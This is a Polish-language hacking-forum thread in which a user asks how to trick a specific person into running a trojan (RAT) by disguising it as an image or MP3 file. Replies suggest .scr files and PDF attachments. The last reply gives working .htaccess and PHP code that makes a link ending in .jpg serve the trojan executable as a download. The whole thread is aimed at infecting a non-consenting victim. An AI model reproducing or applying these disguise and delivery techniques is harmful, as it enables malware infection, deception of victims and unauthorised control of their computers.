Pokaż wyniki 1 do 5 z 5

Temat: RAT - Metody wysyłania.

Domyślnie RAT - Metody wysyłania.

Witam, mam prostego trojana którego chciałbym podesłać pewnej osobie.

Problem polega na tym, że nie wiem w jaki sposób go wysłać.

osoba ta ma wyłączone pokazywanie rozszerzeń plików, więc mógłbym po prostu nazwać to zdjęcie.jpg , ale przy pobieraniu z hostingu ukazuje się prawdziwe rozszerzenie i wychodzi coś w stylu zdjęcie.jpg.exe.

Macie jakieś metody na wysłanie? Na komputerze do którego chcę to wysłać jest mc afee, ale z tego co mi wiadomo jest ciągle wyłączony.

Czy istnieje jakiś binder który dawałby plik wyjściowy w rozszerzeniu .jpg lub np. mp3 ?

Np. Mam zbindowanego trojana z plikiem MP3, i nazywam to McHammer - Cant touch this.MP3 a nie .EXE
    Ostatnio edytowane przez Wachu5747 : 04-25-2014 - 11:22

Domyślnie

Nie da się wykonać pliku o niewykonywalnym rozszerzeniu.

Gdzieś kiedyś czytałem, że da się zrobić taki patent z formatem pdf, bo rzekomo zawiera elementy wykonywalne ale nie mam pojęcia ile w tym prawdy. Więc niech się wypowiedzą na ten temat bardziej doświadczeni fachowcy.
    "Trąba powietrzna moich zepsutych myśli, zrywa ci z karku kołnierz ortopedyczny"

Domyślnie

A moze .scr

Domyślnie

co do pdfa, to ma interaktywne linki i załączniki - użytkownik może kliknąć więc link i coś brzydkiego uruchomić. Ale przed w normalnych programach pojawi się ostrzeżenie.
    Jeśli nie będziesz mieć pod górke, nigdy nie dojdziesz na szczyt.

Domyślnie

Zakładasz konto na byle jakim hostingu z PHP, wrzucasz tam trojana i tworzysz pliki:

".htaccess" o treści:
    Kod:
    AddType application/x-httpd-php .jpg
    "zdjecie.jpg" o treści:
    Kod php:
    <?php
    header
    ('Content-type: application/x-msdownload');
    header('Content-Disposition: attachment; filename="zdjecie.exe"');

readfile('trojan.exe');
    ?>
    Zamiast trojan.exe wpisujesz nazwę pliku z trojanem (niektóre hostingi nie zezwalają na rozszerzenie .exe). Wchodzisz na http://[nazwa hostingu]/zdjecie.jpg i zamiast pliku zdjecie.jpg powinien ci się pobrać trojan, z rozszerzeniem exe. Jeśli nie, w .htaccess zamień AddType na AddHandler i spróbuj jeszcze raz =)

Zasady Postowania